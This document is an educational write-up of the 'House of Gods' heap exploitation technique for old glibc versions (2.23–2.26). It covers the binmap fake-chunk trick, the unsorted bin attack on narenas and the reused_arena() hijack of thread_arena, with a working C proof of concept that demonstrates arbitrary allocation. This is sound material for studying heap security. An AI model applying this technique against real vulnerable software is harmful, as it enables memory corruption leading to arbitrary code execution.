
Overview

The House of Gods is an arena-hijacking technique for glibc < 2.27 that lets an attacker overwrite the thread_arena symbol of the main thread. By hijacking the arena pointer, attackers gain complete control over heap allocation behavior, enabling trivial escalation to arbitrary code execution. The technique replaces main_arena with a carefully crafted fake arena within only 8-11 allocations.

Glibc Version Compatibility

Compatible with: glibc 2.23 - 2.26 only. Patched in glibc 2.27+. The technique relies on specific arena handling that was changed in glibc 2.27. The underlying bug was reported in Bugzilla #29709.

Requirements

  • 8 Allocations: 8 allocations of arbitrary size to hijack arena (+2 for ACE)
  • Chunk Control: Control over first 5 quadwords of chunk userdata
  • Write-After-Free: Single WAF bug on an unsorted chunk
  • Heap Leak: Need heap address leak
  • Libc Leak: Need libc address leak

What It Achieves

The House of Gods enables:
  1. Arena Hijacking: Replace thread_arena with fake arena
  2. Complete Heap Control: Control all malloc operations
  3. Arbitrary Allocation: Return any pointer from malloc
  4. Fast ACE: Trivial escalation to code execution
  5. Efficient: Only 8-11 allocations needed

Technical Details

The Binmap Attack

The core of House of Gods is the “binmap attack” - allocating a fake chunk that overlaps the binmap field within main_arena.

Step 1: Craft Fake Size via Binmap

Allocate and bin a smallchunk (e.g., 0x90) into a smallbin. This triggers mark_bin(m, i), which sets a bit in the binmap. The resulting value 0x200 at offset 0x858 in main_arena serves as a valid size field for a fake chunk at offset 0x850.

Step 2: Link Binmap Chunk to Unsorted Bin

Use a write-after-free bug to redirect the unsorted bin to the binmap-chunk at main_arena + 0x850. The main_arena.next pointer at offset 0x868 acts as a valid bk pointer, passing the partial unlink check.

Step 3: Allocate Binmap Chunk

Request a chunk of size 0x1f8 (matching the fake size). This allocates the binmap-chunk, giving control over main_arena.next at offset 0x868.

Step 4: Unsorted Bin Attack on narenas

Perform unsorted bin attack targeting the narenas variable, writing a large value to exceed narenas_limit. This forces subsequent allocations to reuse arenas.

Step 5: Inject Fake Arena

Write the address of a fake arena into main_arena.next. This fake arena will be in the arena list traversal.

Step 6: Trigger reused_arena()

Make two allocations for 0xffffffffffffffc0 bytes (invalid size). This triggers reused_arena() twice:
  • First call: returns main_arena
  • Second call: traverses to main_arena.next, returns fake arena
  • Sets thread_arena to fake arena address!

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>

int main(void) {
    printf("=================\n");
    printf("= House of Gods =\n");
    printf("=================\n\n");

    printf("=== Abstract ===\n\n");
    printf("The core is to allocate a fakechunk overlapping the binmap field\n");
    printf("within main_arena at offset 0x850. The sizefield is crafted by\n");
    printf("binning chunks into smallbins or largebins. The binmap-chunk is\n");
    printf("linked into unsorted bin via WAF, allocated back, giving control\n");
    printf("over main_arena.next at offset 0x868. Unsorted bin attack corrupts\n");
    printf("narenas with a large value. Two allocations for 0xffffffffffffffc0\n");
    printf("bytes trigger reused_arena() twice, traversing the corrupted arena\n");
    printf("list and setting thread_arena to the fake arena.\n\n");

    printf("=== PoC ===\n\n");

    // ========== Allocation 1-3: Setup ==========
    void *SMALLCHUNK = malloc(0x88);
    void *FAST20 = malloc(0x18);
    void *FAST40 = malloc(0x38);

    printf("%p is our 0x90 smallchunk for forging fake size\n", SMALLCHUNK);
    printf("%p is our first fastchunk (0x20)\n", FAST20);
    printf("%p is our second fastchunk (0x40)\n\n", FAST40);

    // ========== Move smallchunk to unsorted bin ==========
    printf("Free smallchunk to move to unsorted bin...\n\n");
    free(SMALLCHUNK);

    // Simulate libc leak
    const uint64_t leak = *((uint64_t*) SMALLCHUNK);

    // ========== Allocation 4: Trigger binmap ==========
    printf("Allocate 0xa0 chunk to bin SMALLCHUNK into 0x90-smallbin\n");
    printf("This sets binmap at offset 0x858 to 0x200 - our fake size!\n\n");
    void *INTM = malloc(0x98);

    // ========== Allocation 5: Setup for binmap attack ==========
    printf("Allocate another smallchunk for binmap attack...\n");
    SMALLCHUNK = malloc(0x88);
    free(SMALLCHUNK);

    printf("Tamper with freed chunk's bk pointer (WAF bug)\n\n");
    
    /* VULNERABILITY #1: Write-after-free */
    *((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8; // Point to binmap
    /* VULNERABILITY #1 */

    printf("Redirect unsorted bin to binmap-chunk.\n");
    printf("Fix bin by setting up fastbin chunks...\n\n");

    // Setup bk chain via fastbin
    *((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);
    free(FAST20);
    free(FAST40);

    printf("Unsorted bin chain:\n");
    printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n\n");

    // ========== Allocation 6: Allocate binmap chunk ==========
    printf("Allocate the binmap-chunk (size 0x1f8)...\n\n");
    void *BINMAP = malloc(0x1f8);

    printf("Success! Now we control main_arena.next and main_arena.system_mem\n\n");

    // ========== Setup unsorted bin attack ==========
    printf("Setup unsorted bin attack on narenas...\n");
    printf("Set INTM's bk to narenas-0x10\n\n");
    
    /* VULNERABILITY #2: Control over allocated chunk */
    *((uint64_t*) (INTM + 0x8)) = leak - 0xa20; // narenas - 0x10
    /* VULNERABILITY #2 */

    printf("Set main_arena.system_mem to pass size checks\n\n");
    *((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;

    // ========== Allocation 7: Unsorted bin attack ==========
    printf("Trigger unsorted bin attack by allocating INTM...\n\n");
    INTM = malloc(0x98);

    printf("narenas now contains main_arena address (very large value)\n\n");

    // ========== Inject fake arena ==========
    printf("Inject fake arena address into main_arena.next...\n");
    printf("Reusing INTM as fake arena for demo\n\n");
    
    *((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);

    // ========== Trigger reused_arena ==========
    printf("Trigger reused_arena() twice with invalid size requests...\n\n");
    
    malloc(0xffffffffffffffbf + 1); // First call: returns main_arena
    malloc(0xffffffffffffffbf + 1); // Second call: returns fake arena!

    printf("thread_arena now points to our fake arena!\n\n");

    // ========== Demonstrate control ==========
    printf("Demonstrate arbitrary allocation from fake arena...\n\n");

    // Create fake 0x70 chunk on stack
    uint64_t fakechunk[4] = {
        0x0000000000000000, 0x0000000000000073,
        0x4141414141414141, 0x0000000000000000
    };

    // Place in fake arena's 0x70-fastbin
    *((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);

    printf("Fakechunk at %p\n", fakechunk);
    printf("Target data at %p: %#lx\n\n", &fakechunk[2], fakechunk[2]);

    // ========== Allocation 8: Arbitrary allocation ==========
    printf("Request 0x70 chunk from fake arena...\n");
    void *FAKECHUNK = malloc(0x68);

    printf("Returned: %p\n\n", FAKECHUNK);
    printf("Overwriting allocated chunk changes target data: ");
    
    *((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;
    printf("%#lx\n", fakechunk[2]);

    assert(fakechunk[2] == 0x4242424242424242);

    return EXIT_SUCCESS;
}

Walkthrough

The binmap is a bitmap in main_arena that tracks which bins contain chunks:
struct malloc_state {
  // ... fields ...
  unsigned int binmap[4];  // At offset 0x858 (glibc 2.23, x86-64)
  // ...
};
When a chunk is binned, mark_bin(m, i) sets a bit (simplified; glibc implements this as a macro):
static void mark_bin (mstate m, int i) {
  m->binmap[i / 32] |= (1U << (i % 32));
}
For a 0x90 chunk, this sets binmap[0] to 0x200. binmap[0] sits at offset 0x858, exactly where the size field of a fake chunk at offset 0x850 lands. Reading memory at offset 0x858 (little-endian):
+0x858: 0x00
+0x859: 0x02  ← binmap value
+0x85a: 0x00
+0x85b: 0x00
+0x85c: 0x00
+0x85d: 0x00
+0x85e: 0x00
+0x85f: 0x00
This forms size 0x0200, valid for the unsorted bin!
When narenas exceeds narenas_limit, malloc calls reused_arena():
static mstate reused_arena(mstate avoid_arena) {
  mstate result = next_to_use;
  // ...
  result = result->next;  // Traverse arena list
  // ...
  return result;
}
The arena list is:
main_arena -> main_arena.next -> ...
By controlling main_arena.next, we control where the second call goes!

First call:
  • Starts at next_to_use (= main_arena)
  • Returns main_arena
Second call:
  • Starts at main_arena (from first call)
  • Traverses to main_arena.next (our fake arena!)
  • Returns fake arena
  • Sets thread_arena = fake_arena
When you request 0xffffffffffffffc0 bytes:
  1. Malloc adds header size: 0xffffffffffffffc0 + 0x10 = 0xffffffffffffffd0
  2. Checks if size > PTRDIFF_MAX (maximum valid size)
  3. Fails size check, returns NULL
  4. Before returning, tries to find working arena
  5. Calls reused_arena() to get a different arena
  6. Retries with new arena
This triggers arena traversal without actually allocating anything!
The fake arena only needs minimal setup:
struct malloc_state {
  mutex_t mutex;              // +0x00
  int flags;                  // +0x04  
  mfastbinptr fastbinsY[10];  // +0x08 ← We control this!
  // ... rest doesn't matter for fastbin ...
};
For fastbin-based arbitrary allocation:
  • Set fastbinsY[index] to target address
  • Ensure target has valid size field
  • Call malloc(size) to get target back
For more advanced attacks, populate more fields.

Visual Representation

main_arena Layout:
+0x000: mutex
+0x004: flags
+0x008: fastbinsY[10]
  ...
+0x850: prev_size  ← Fake chunk starts here!
+0x858: binmap[0]  ← Fake size (0x200)
+0x85c: binmap[1]
+0x860: binmap[2]
+0x864: binmap[3]
+0x868: next       ← We control this (main_arena.next)

Arena List After Attack:
main_arena ──next──→ fake_arena
                          ▲
                          │
                    thread_arena

Allocation Flow:
malloc(0x68) → checks thread_arena
             → thread_arena = fake_arena
             → reads fake_arena->fastbinsY[5] (0x70 fastbin)
             → returns stack_chunk

CTF Challenges

No specific challenges listed, but applicable to:
  • CTF challenges on Ubuntu 16.04 (glibc 2.23)
  • Old challenges on glibc 2.24-2.26
  • Historical heap exploitation challenges

References

  • House of Mind - Another arena manipulation technique
  • House of Orange - File stream exploitation with arena
  • Unsorted Bin Attack - Used in this technique

Author

David Milosevic (milo)
